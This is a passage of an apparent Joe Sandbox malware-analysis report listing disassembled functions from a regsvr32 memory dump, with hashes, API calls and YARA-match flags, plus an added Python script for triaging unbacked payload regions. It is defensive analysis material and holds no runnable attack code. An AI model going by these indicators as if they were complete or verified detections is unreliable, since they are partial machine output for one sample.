                                                                      • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                      • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                      • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >97"$?$LsRW$~x
                                                                      • API String ID: 0-2554301858
                                                                      • Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                      • Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
                                                                      • Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                      • Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B$EG$QsF$_
                                                                      • API String ID: 0-784369960
                                                                      • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                      • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                      • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                      • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                      • API String ID: 0-1363032466
                                                                      • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                      • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                      • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                      • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *+_$WSh$\O$#o
                                                                      • API String ID: 0-1846314129
                                                                      • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                      • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                      • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                      • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .B$O$M*K$\<
                                                                      • API String ID: 0-3225238681
                                                                      • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                      • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                      • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                      • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$$$xVO$~O
                                                                      • API String ID: 0-3655128719
                                                                      • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                      • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                      • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                      • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,IW$G$JMg$l
                                                                      • API String ID: 0-1370644289
                                                                      • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                      • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                      • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                      • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$__tzset
                                                                      • String ID:
                                                                      • API String ID: 3587134695-0
                                                                      • Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                      • Instruction ID: 1bad245395f53795e92f7c5d10843aefde54aaad6d4d16c46b6e41539bcdf361
                                                                      • Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                      • Instruction Fuzzy Hash: CF028632A08682CFE7648F29989113D67D1FB66741F2CC03AD74E46E99CFB9E944E701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$DecodePointer_lock
                                                                      • String ID:
                                                                      • API String ID: 2175075375-0
                                                                      • Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                      • Instruction ID: 42b9b397caaf8a2a8f3f860aaa3937065632f47d3ec97fb9009ee237a911c528
                                                                      • Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                      • Instruction Fuzzy Hash: C331BE21B0D743C2FB659B62991137B61D1DF56384F1CC034DE4E46E8EDFAEE400A202
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlCaptureContext.KERNEL32 ref: 00007FFA526AD357
                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA526AD39D
                                                                      • UnhandledExceptionFilter.KERNEL32 ref: 00007FFA526AD3A8
                                                                        • Part of subcall function 00007FFA526A6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFA526A7194,?,?,?,?,00007FFA526A6C69,?,?,00000000,00007FFA526A30C0), ref: 00007FFA526A6FCF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                      • String ID:
                                                                      • API String ID: 2731829486-0
                                                                      • Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                      • Instruction ID: 3ae90d7e6c002a8eccf06b8bc917f1851b6b32ac1c506c86938356e77a110609
                                                                      • Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                      • Instruction Fuzzy Hash: 91114F25A2CA8682EB259B54EC543BA63D1FFC7304F488139D58D02E9DDFADE105CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
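The records above are the report's per-function similarity entries: each one names the memory region a function was disassembled from ("based on PE: true" for a normally loaded module, "false" for a region with no file behind it), the APIs it calls, an Opcode ID, and an Instruction Fuzzy Hash. What an analyst usually wants from such a listing is the set of hashes belonging to the unbacked region, because in a regsvr32 process that is where an unpacked payload tends to live. The following Python is an added example, not Joe Sandbox code and not part of this report; it parses records in the rendered format and separates the two kinds of region. The sample text is abridged from two records of this excerpt. Treating the unbacked region as the likely payload, and treating a -1.00% uniqueness score as "not computed", are analyst assumptions, not statements made by the report.

```python
"""Parse Joe Sandbox function-similarity records (the blocks in this report)
and pull out the entries worth triaging. Added example, not Joe Sandbox code."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: two records abridged from this report excerpt.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: =_$F)k$b/$syG
• API String ID: 0-3955183656
• Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
• Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlCaptureContext.KERNEL32 ref: 00007FFA526AD357
• SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA526AD39D
• UnhandledExceptionFilter.KERNEL32 ref: 00007FFA526AD3A8
  • Part of subcall function 00007FFA526A6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526A6FCF
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
• String ID:
• API String ID: 2731829486-0
• Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
• Instruction Fuzzy Hash: 91114F25A2CA8682EB259B54EC543BA63D1FFC7304F488139D58D02E9DDFADE105CB41
Uniqueness

Uniqueness Score: -1.00%
"""

@dataclass
class FunctionRecord:
    kind: str                                     # record header: "Strings" or "APIs"
    source_file: str = ""
    offset: int = 0                               # base address of the dumped region
    pe_backed: bool = False                       # "based on PE: true/false"
    fields: dict = field(default_factory=dict)    # API ID, String ID, Opcode ID, ...
    api_refs: list = field(default_factory=list)  # (api, module, call-site address)
    uniqueness: float | None = None               # -1.00% in this report; read as "not computed" (assumption)

START_RE = re.compile(r"^(Strings|APIs)$")
SOURCE_RE = re.compile(r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
REF_RE = re.compile(r"(\w+)\.(\w+)(?:\(|\s).*\bref:\s*([0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
UNIQ_RE = re.compile(r"Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%")

def parse_records(text: str) -> list[FunctionRecord]:
    """One FunctionRecord per 'Strings'/'APIs' block, in report order."""
    records: list[FunctionRecord] = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()                        # the rendered report indents every line
        if START_RE.match(line):
            cur = FunctionRecord(kind=line)
            records.append(cur)
        elif cur is None or not line:
            continue
        elif m := SOURCE_RE.search(line):
            cur.source_file, cur.offset, cur.pe_backed = m[1], int(m[2], 16), m[3] == "true"
        elif " ref: " in line and (m := REF_RE.search(line)):
            cur.api_refs.append((m[1], m[2], int(m[3], 16)))   # subcall refs included
        elif m := UNIQ_RE.search(line):
            cur.uniqueness = float(m[1])
        elif m := FIELD_RE.match(line):
            # "Download File" is link text from the HTML report, not part of the value
            cur.fields[m[1].strip()] = m[2].strip().removesuffix("Download File").strip()
    return records

def unbacked_functions(records):
    """Records dumped from memory with no PE file behind it. Analyst heuristic
    (assumption): in a regsvr32 process this is where an unpacked payload sits."""
    return [r for r in records if not r.pe_backed]

def fuzzy_hashes(records):
    """Opcode ID -> Instruction Fuzzy Hash, the pair to seed a similarity search."""
    return {r.fields["Opcode ID"]: r.fields.get("Instruction Fuzzy Hash", "")
            for r in records if "Opcode ID" in r.fields}

def calls_api(records, api_name):
    """Records whose API references (own or via a subcall) name api_name."""
    return [r for r in records if any(a == api_name for a, _, _ in r.api_refs)]

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in unbacked_functions(recs):
        print(f"unbacked {r.offset:#x} {r.kind}: {r.fields['Instruction Fuzzy Hash']}")
    for r in calls_api(recs, "SetUnhandledExceptionFilter"):
        print("sets UEF:", [a for a, _, _ in r.api_refs])
```

Running it on the full report text (copied out of the page) rather than on the sample gives one dictionary of fuzzy hashes for the 0x180001000 region, which is the input an analyst would compare against other dumps; the PE-backed records at 0x7FFA52660000 are left out of that set so that module code does not pollute the comparison.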

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *4$5F$S^r
                                                                      • API String ID: 0-3556444313
                                                                      • Opcode ID: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                      • Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
                                                                      • Opcode Fuzzy Hash: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                      • Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &lz2$'~W$<x<
                                                                      • API String ID: 0-2268522332
                                                                      • Opcode ID: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                      • Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
                                                                      • Opcode Fuzzy Hash: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                      • Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: o6.$s8Q${Fl&
                                                                      • API String ID: 0-2665016659
                                                                      • Opcode ID: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                      • Instruction ID: 345269621f88c341702fdf3610a73dbdf39058324611beb6fba665c489d4de0b
                                                                      • Opcode Fuzzy Hash: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                      • Instruction Fuzzy Hash: 48E1D7705087C88BDBFEDF64C88A7DA7BACFB44708F105219EA4A8E258DB745749CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$T]0$ba^2
                                                                      • API String ID: 0-1276948933
                                                                      • Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                      • Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
                                                                      • Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                      • Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6w5*$EDO$V
                                                                      • API String ID: 0-1640223502
                                                                      • Opcode ID: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                      • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                      • Opcode Fuzzy Hash: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                      • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Y()$i_"o$|Y
                                                                      • API String ID: 0-942011364
                                                                      • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                      • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
                                                                      • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                      • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O)$,G$-
                                                                      • API String ID: 0-23008916
                                                                      • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                      • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                      • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                      • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;U[$L$Q#
                                                                      • API String ID: 0-2933747092
                                                                      • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                      • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                      • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                      • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5($<:*$qwX
                                                                      • API String ID: 0-3944236288
                                                                      • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                      • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                      • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                      • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 79&$s`~$v;
                                                                      • API String ID: 0-3844292866
                                                                      • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                      • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                      • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                      • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: wQ_$1_$ac
                                                                      • API String ID: 0-1037425278
                                                                      • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                      • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                      • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                      • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )K$U|$|1-
                                                                      • API String ID: 0-2543966960
                                                                      • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                      • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                      • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                      • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
